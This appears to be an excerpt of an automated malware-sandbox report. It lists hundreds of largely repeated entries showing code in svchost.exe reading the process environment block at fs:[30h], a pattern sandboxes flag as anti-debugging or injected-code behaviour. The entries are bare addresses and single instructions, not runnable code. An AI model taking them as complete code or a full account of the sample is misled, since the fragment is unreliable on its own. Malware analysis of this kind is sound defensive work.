            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]2_2_03CEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]2_2_03CEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03CDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]2_2_03C5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03CBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]2_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]2_2_03CD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]2_2_03CDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]2_2_03C2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]2_2_03C30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]2_2_03D04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]2_2_03C68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]2_2_03C86AA4
